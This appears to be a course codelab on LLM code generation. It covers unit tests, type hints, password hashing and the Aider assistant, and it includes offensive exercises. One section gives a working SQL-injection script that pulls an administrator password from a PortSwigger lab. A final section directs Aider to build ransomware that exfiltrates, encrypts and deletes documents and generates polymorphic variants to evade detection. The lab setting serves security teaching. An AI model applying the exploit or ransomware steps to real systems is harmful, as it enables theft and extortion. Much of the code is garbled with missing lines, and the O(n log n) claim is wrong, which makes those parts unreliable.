In this week's exercises, your group will try out the various tasks for code generation using LLMs. Begin by completing the initial parts of the codelab. Then, attempt the exercise your group has been assigned in the following Google Slide presentation:

Add screenshots that you can use to walkthrough how you performed the exercise. Your group will present your results for the exercise during the last hour of class. After completing the exercise you've been assigned, continue to the rest of the exercises in order to prepare for the week's homework assignment.

Code generation is one of the more useful tasks a model can do. It's difficult to trust the code it produces without having an idea of what a correct version of the code looks like. In this exercise, a simple Python class that implements a username-password authentication function using a SQLite3 database is shown. Within the class:

import sqlite3

DB_FILE = 'users.db'    # file for our Database

class Users():
    def __init__(self):
        self.connection = sqlite3.connect(DB_FILE)
        cursor = self.connection.cursor()
            cursor.execute("select count(rowid) from users")
        except sqlite3.OperationalError:

    def initializeUsers(self):
        cursor = self.connection.cursor()
        cursor.execute("create table users (username text, password text)")

    def addUser(self, username, password):
        cursor = self.connection.cursor()
        params = {'username':username}
        cursor.execute("SELECT username FROM users WHERE username=(:username)", params)
        res = cursor.fetchall()
        if len(res) == 0:
            params = {'username':username, 'password':password}
            cursor.execute("insert into users (username, password) VALUES (:username, :password)", params)
            return True
            return False

    def checkUser(self, username, password):
        params = {'username':username}
        cursor = self.connection.cursor()
        cursor.execute("select password from users WHERE username=(:username)", params)
        res = cursor.fetchall()
        if len(res) != 0:
            password_from_db = res.pop()[0]
            if password == password_from_db:
                return True
        return False

The goal of the exercise is to generate a prompt that allows an LLM to produce

Unit tests that are built into a program allow one to catch code changes that may break the functionality of the application. For example, consider the code below that implements a square root.

import math

def square_root(n):
    if isinstance(n, int) and n >= 0:
        return math.sqrt(n)
        raise ValueError("Input must be a positive integer.")

To add unit tests to this code, one could utilize the unittest package in Python and add assertions that should hold on a variety of test cases. An example is shown below

class TestSquareRoot(unittest.TestCase):
    def test_zero(self):
        self.assertEqual(square_root(0), 0.0)

    def test_non_integer(self):
        with self.assertRaises(ValueError):
        with self.assertRaises(ValueError):
        with self.assertRaises(ValueError):

    def test_negative_integer(self):
        with self.assertRaises(ValueError):

if __name__ == "__main__":

For our password authentication example, we wish to test the expected behavior of the code across a variety of tests to ensure correctness. For example, the code should:

While one could generate these tests manually, an LLM may be able to generate them instead.

Python versions beyond 3.5 support type annotations in order to give the developer the ability to reason about data types within their programs. Adding type annotations to code written prior to this version is something that can be potentially automated by an LLM. Consider the code below that fetches a URL using the requests package, parses the page using BeautifulSoup, and then returns the page's <title> tag if it exists.

import requests
from bs4 import BeautifulSoup

def getUrlTitle(url):
    resp = requests.get(url)
    title_tag = BeautifulSoup(resp.text, 'html.parser').find('title')
    if title_tag and title_tag.text:
        return title_tag.text.strip()
        return None

A fully annotated version is shown below with each parameter and return value assigned a type, along with any variable that has been utilized. In addition, the Optional type is used when the return type can be either the given type (e.g. str) or None.

import requests
from bs4 import BeautifulSoup
from typing import Optional 

def getUrlTitle(url: str) -> Optional[str]:  
    resp: requests.Response = requests.get(url)    
    soup: BeautifulSoup = BeautifulSoup(resp.text, 'html.parser')  

    title_tag: Optional[BeautifulSoup.Tag] = soup.find('title')  
    if title_tag and title_tag.text:
        return title_tag.text.strip()
        return None

With the code given previously for the password authentication program

One of the potential uses for a code-based LLM is to take existing code and implement new functionality. Consider the code below that sequentially downloads URLs and pulls out their <title> tags.

def getUrlTitle(url):
    resp = requests.get(url)
    title_tag = BeautifulSoup(resp.text, 'html.parser').find('title')

def getSequential(urls):
    titles = []
    for u in urls:

urls = 
print(getSequential(['', '']))

One can convert the code to use asynchronous calls as shown below using an LLM

async def getUrlTitle(session, url):
    async with session.get(url) as resp:
        html = await resp.text()
        title_tag = BeautifulSoup(html, 'html.parser').find('title')

async def getAsync(urls):
    async with aiohttp.ClientSession() as session:
        tasks = [getUrlTitle(session, url) for url in urls]
        titles = await asyncio.gather(*tasks)
        return titles

print(['', ''])))

The prior password program utilizes cleartext passwords in its implementation instead of a password hash of it. Unfortunately, if the system were compromised, cleartext passwords for every user would be exposed, allowing an adversary to perform credential stuffing. Given the original password code:

LLMs have been successfully used to translate text from one language to another. Since programming languages are just another type of language, one potential use for LLMs is to automatically translate a program to another programming language.


In this exercise, we'll translate our original password code written in Python into Javascript. We'll begin by asking an LLM to create a Javascript equivalent for the password program. As part of the prompt, give the LLM some additional instructions to guide its translation such as:

Using the above as a guide,

To run the code, bring up the course VM and install the latest Node.js version.

sudo apt update -y
sudo apt install nodejs npm -y
sudo npm install -g n
sudo n stable
hash -r

Create a directory to run the application from, and install the Javascript packages that are required.

mkdir js
cd js
npm install sqlite3

Copy the code the LLM produced into the file users.js. Then, run the code.

node users.js


We'll attempt to repeat the exercise using Typescript instead.

Install the Typescript package

npm install ts-node

Copy the code the LLM produced into the file users.ts. Then, run the npx command to transpile the code to Javascript and execute it.

npx ts-node users.js

LLMs can be used to rapidly speed up the process of exploit development. Open the Portswigger level After reading the lab description and the hint click the access the lab button. The level has a SQL injection vulnerability in its tracking cookie (TrackingID) that allows one to exfiltrate the password for the administrator account programmatically. The code below performs a brute-force linear search on each character of the password in order to solve the level.

import requests
from bs4 import BeautifulSoup
import time
import urllib.parse

def test_string(url, prefix, letter):
    query = f"x' union select 'a' from users where username = 'administrator' and password ~ '^{prefix}{letter}'--"
    print(f'Testing ^{prefix}{letter}')
    mycookies = {'TrackingId': urllib.parse.quote_plus(query)}

    resp = requests.get(url, cookies=mycookies)
    soup = BeautifulSoup(resp.text, 'html.parser')

    if soup.find('div', text='Welcome back!'):
        print(f'Found character {letter}')
        return True
        return False

site = ''
url = f'https://{site}/'
start_alpha = 'abcdefghijklmnopqrstuvwxyz0123456789'
prefix = ''

begin_time = time.perf_counter()
while True:
  if test_string(url, prefix, '$'):
  for letter in start_alpha:
    check = test_string(url, prefix, letter)
    if check:
      prefix += letter

print(f'Password is {prefix}')
print(f"Time elapsed is {time.perf_counter()-begin_time}")

As part of the homework assignment, students create a version of the prior program that performs a binary search instead of a linear search, thus reducing the run-time for finding each character of the password from O(n) where n is the number of characters in the character set to O(n log n). For example, the following injection utilizes the ~ operator in SQL to perform a regular expression search on the first letter of the administrator's password.

charset = string.ascii_lowercase + string.digits

query = """x' UNION SELECT username from users where username = 'administrator' and password ~ '^[{charset[:mid]}]' --"""

Using the linear search program and instructing the LLM to generate a program that implements a binary search algorithm per character using the ~ operator,

Another task an LLM may help with is to generate regular expressions based on strings that a user supplies. Consider the strings below that are used to polymorph the User-Agent: HTTP header in an attempt to evade detection. Filtering software could be configured with a singular regular expression that covers all of these strings.


Query the LLM to see if it is able to generate a Python regular expression that matches all of the strings above. Then visit to validate the expression against the data provided.

There are limits to how accurately a model can perform this task. Repeat the task, but insert strings that can cause the LLM to produce an incorrect result.

When an application takes input controlled by an end user and uses it within the application, it must either be properly encoded (where sensitive characters are converted into innocuous ones) or filtered (where sensitive characters are simply removed). Without doing so, attacks such as command injection, SQL injection, and cross-site scripting (XSS) can occur. In this exercise, we will examine an LLMs ability to produce code that performs appropriate encoding and filtering.

An algorithm that is encoding and escaping input needs to be written according to the context in which the input is used in the application, leading the developer to encode different characters based on where the input is consumed. In this exercise, consider a string named user_input whose value is given by the user. Prompt an LLM to generate Python code that encodes user_input so it can be:

In the previous exercise, an LLM was used to perform encoding and escaping on a user's input to ensure it could be safely used in a particular application context. Another approach to sanitize input is to simply filter sensitive characters completely. Prompt an LLM to generate Python code that filters a string stored in user_input so that it can be:

Because of the ability of modern LLMs to produce code, there are many tools that help integrate their use in the development process. For example, Github Copilot is often utilized within VSCode in order to provide in-line code generation within a developer's coding environment. One such tool for producing code is Aider: a software engineering assistant that provides a pair programming experience with an LLM. Developers interact with Aider via a command line interface. Two of Aider's features that make it useful are its modification of local git repos for better control over code modifications as well as the use of Tree Sitter, a program that parses code and builds concrete syntax trees. In this exercise we will create a guestbook web application on our course VM using Python Flask.

Cloud Shell

The web application we'll be using will run on Python Flask's default port of 5000. In order to access this port on our course's Linux VM, we will need to create a firewall rule that allows traffic to the port, then apply it to the VM. Bring up a session on Cloud Shell and create the rule, specifying a tag name of flask-server.

gcloud compute firewall-rules create default-allow-flask \
  --allow=tcp:5000 --target-tags=flask-server

Then, apply the tag to the course VM.

gcloud compute instances add-tags course-vm --tags=flask-server

Course Linux VM

The application has a home page that allows ‘guests' to post comments that are then rendered on the page with the guests name, email, message, and a timestamp. The first step will be to create a folder for our new Aider project.

mkdir -p ~/Aider/guestbook
cd ~/Aider/guestbook

python3 -m venv env
source env/bin/activate
pip install aider-chat 

Set up an environment variable named GEMINI_API_KEY that contains the same value as the GOOGLE_API_KEY you have set previously. Note that Aider offers usage with OpenAI and Anthropic, as well as other providers.


Visit the AiderLLMLeaderBoard to see what models perform the best: Aider can be used with any of the models listed and you can launch Aider with a particular model using the command below

aider --model <MODEL_NAME>

Launch Aider with a given model:

aider --model gemini/gemini-1.5-pro-002

Agree to make a git repository when the program starts. Note that, If you want to change the model you are using from within Aider, the tool provides a convenient interface. The /models command shows the available models and can also be used to search for models not present on the leaderboard by name.

/models <QUERY>

The /model command allows you to switch to a different model.

/model <MODEL_NAME>

Aider has a 'help' mode that we can invoke using the /help. Run the command.


We'll be using a subset of these commands in our initial labs. Using /help, we can then ask a question about Aider's different chat modes:

/help What are Aider's different chat modes?

This command will ask to install added dependencies which will load a vector database of all Aider's docs and then use RAG to provide context for specific Aider documentation when the user uses the /help command. We now have a personal Aider assistant!

Next we will explore how other chat modes can be used. This Guestbook application will use the model-view-controller (MVC) architecture. Instead of describing to you what the MVC architecture is, use the Aider's 'ask' mode via /ask to get an explanation.

/ask What is the Model-View-Controller design architecture?

Now that we have a rough overview of what the design architecture we will be using, we can begin to implement the application. For this exercise, we will define the structure of the code in one large step and try to debug the code if any issues arise.

Here are the steps:

  1. Define a high level overview of the application and have Aider create the project structure
  2. Ask Aider to install the necessary dependencies
  3. Use the /help command along with /architect and /ask to fix any issues there might be
  4. Try running the application (if it is not clear how to do so ask Aider)

First let's ask Aider the best chat mode to use for the first step:

/help What chat mode should be used to create the file structure of a web application?

Now let's test out the power of Aider and current chat models using the 'architect' mode (it is recommended to use one of the models on the top of the AiderLLM leaderboard for this step). Consider the prompt below:

The prompt is intentionally detailed and explicit in order to give the LLM exactly what it needs to produce the expected code. Within Aider, use architect mode to handle this prompt.

/architect I want to ...

Aider should show you the file structure and ask you if you would like to implement it. Select Yes. Then agree to add the files to the chat and to create the files. Note that Aider may attempt to reimplement the application using a persistent backend such as SQLite3. If so, decline the request. If it has been added, you can 'undo' the commit via:


In the next step, we will ask Aider to install the dependencies that are needed. First, check that the files that were just created are in the chat:


This will display the files in chat. If your applications files are not in the chat add them using the command


Now that the files are added to the chat we will use the architect chat-mode to ask for Aider to create a requirements.txt file that installs the necessary dependencies.

/architect Please create a requirements.txt file in the application folder that includes all of the necessary dependencies.

Now ask Aider how to install the dependencies if it has not already done so. It will prompt you to run the commands within the shell to set the environment up.

Please install the dependencies in the requirements.txt file in the repository

See troubleshooting tips if it gets caught in a loop or cannot find the file. Now ask Aider to run the application:

Please run the application

If there are errors anywhere in this series of steps, you can exit the application with Ctrl+c, add the error output to the chat, then ask Aider to fix the error. Other troubleshooting tips can be found in the troubleshooting section at the end of the lab.

Fix the error

Once the app is successfully created, open your application in a web browser. To do so, find the 'External IP address' of the course VM. Then, in a browser window, enter the URL


Enter a message. If the User interface is not updated with the message or there is an error please use the troubleshooting tips in the next section. Once you successfully have an application running on the local host exit by hitting Ctrl+c.

Use the ask command to inquire about the security of the application:

/ask Is this code ready for production? What security concerns are there?

Troubleshooting tips

First and foremost, always read what the model is telling you after creating code or advising you on a command. In addition, try using the model with the highest leaderboard position.

Using Aider

Ask Aider directly how to do something

/help <Your Question about Aider>

Inquire about a certain aspect of your project

/ask <Question about code>

Files don't exist or Aider enters a loop

Look at what Aider is trying to do. Look at the project structure. Use the run command to manually enter in the commands that Aider may be struggling with:

/run <Your command here>

Running the Application

Even though the default chat-mode of Aider is /code, it should still be able to respond to your question and even give you a command to run. First make sure that the files of the project are in the chat.


If the project files are not in the chat enter:

/add <Your project files>

Now simply ask the default chat-mode(code) how to run the application

How do I run the application?

It should ask you if you want to execute the presented command. If it fails use:

/ask How do I run the application?

Then run the command by entering it into Aider:

/run <Command here>

Dependency conflicts

Ask Aider to install the dependencies in the requirements.txt file. If there is an error, when Aider asks if you want to add the output to the chat select Yes. Then ask:

/architect Please update the requirements.txt file so that there are no dependency conflicts

If using a powerful model, it should be able to resolve the conflicts for you.

Starting Over

You can exit Aider via


Next remove all of the project files from the repo

rm <Your Files Here>

After this re-enter aider and type


After deleting the files and updating it via git. Now you can reset the repo map using:


Next use the rest command to drop all files and clear the chat (just in case):


Now double check that the repository is empty


Model Cannot Follow correct Formatting

The first step that you can try is changing the model to see if it fairs any better. Check the leaderboard and use a model with a higher score on using the correct formatting. Then switch to the model:

/model <model name>

If that doesn't work try removing unnecessary files from the chat using

/drop <file name>

You could also clear the chat history using:


The reason why these steps could be helpful is that it declutters the chat, allowing the model to better adhere to the formatting. If you want to try getting rid of everything in the chat including all the files use


In this exercise Aider will be used to assist in the incremental development of a ransomware program that performs data exfiltration. The program will carry out the following steps:

  1. Scan the file system for PDFs and Microsoft Word Documents
  2. Save the documents it finds in a zip file
  3. Upload the zip file to a web server
  4. Encrypt the zip file using a key
  5. Delete the original files.

Course Linux VM

Use the web console to bring up an ssh session on your virtual machine. We'll be needing multiple ssh sessions on our VM to perform the lab. To support multiple sessions in a single terminal, we can utilize tmux: a terminal multiplexer. tmux utilizes keyboard shortcuts that are triggered after hitting Ctrl+b to navigate multiple terminals within a single window. To start a tmux session, run it in the terminal.


To create a new terminal the command is:

As can be seen by the lower tabs on the screen, there are now two multiplexed terminals active. You can now switch between them by using the command:

Web server application tmux session

Use the web console to bring up an ssh session on your virtual machine. Change into the source directory containing the examples, create a virtual environment, activate it, and install the packages.

cd cs410g-src/08*
git pull
virtualenv -p python3 env
source env/bin/activate
pip install -r requirements.txt

Then, run the web application in the directory. This application runs a simple upload server that your generated program will upload files to.


Iconify the ssh window as you complete the rest of the exercise.

Aider tmux session

Create a new tmux window if you have not already, Ctrl+b followed by c. Switch to this window. Now, using the instructions below, create a directory for your application then create a virtual environment with Aider installed in it.

mkdir -p ~/Aider/malware
cd ~/Aider/malware

python3 -m venv env
source env/bin/activate
pip install aider-chat  

Set up an environment variable named GEMINI_API_KEY that contains the same value as the GOOGLE_API_KEY you have set previously. Note that Aider offers usage with OpenAI and Anthropic, as well as other providers.


Finally, launch Aider:

aider --model <MODEL_NAME>

Stage 1: Find PDFs on the system

Now it is time to have Aider make the first git commit:

Check file that was created by running a shell command to dump its contents:

/run cat

Now that it has been verified that Aider made a local commit, it would be nice to have a way to test the function that Aider created.

Aider allows developers to run shell commands within an Aider session. This example will use this feature to test the script that was written. First find the path to your course directory, cs410g-src, using the /run command and ls. Add to your home directory path until you find the directory. Then run the script using the path to your course directory.


Stage 2: Create a zip file from the PDFs

To efficiently load the files off the system, it is necessary to compress them.

Now to test that the file is being created in the correct location Aider can be used to make unit tests:

Stage 3: Load file to HTTP endpoint

The next step for a data ransomware campaign might be to exfiltrate the files from the target system to a server that the adversary controls. Modify the current project using Aider to add this functionality.

(Note: Don't add the url to the chat. This is for PlayWright, an automated web browsing feature)

Now test the script that Aider wrote by using the /test command. This will add the output to the chat:

/test python <course home directory>

Stage 4: Encrypt the PDF files

A ransomware payload would want to make the exfiltrated files unusable to the target so that the target administrators are forced to pay a ransom in order to decrypt their files. This could be done using either asymmetric or symmetric encryption. This exercise will use symmetric encryption so that the encryption key and decryption key are the same.

Install the dependencies (if Aider has not prompted you to do so already), and run the script:

/run pip install -r requirements.txt
/test python <COURSE_DIRECTORY>

You have now simulated the exfiltration of sensitive pdf files and then encrypting them to ensure the owner of the files cannot regain access to the data. In an actual pentest engagement you would have exfiltrated the files to a server you own.

Stage 5: Polymorphic Code generation

To make the ransomware harder to detect it can be useful to create variants of the code that have identical functionality.

Test the code again:

/test python <COURSE_DIRECTORY>

Now exit Aider


Then to exit out of tmux type exit for each tmux window and you will be returned to the base terminal.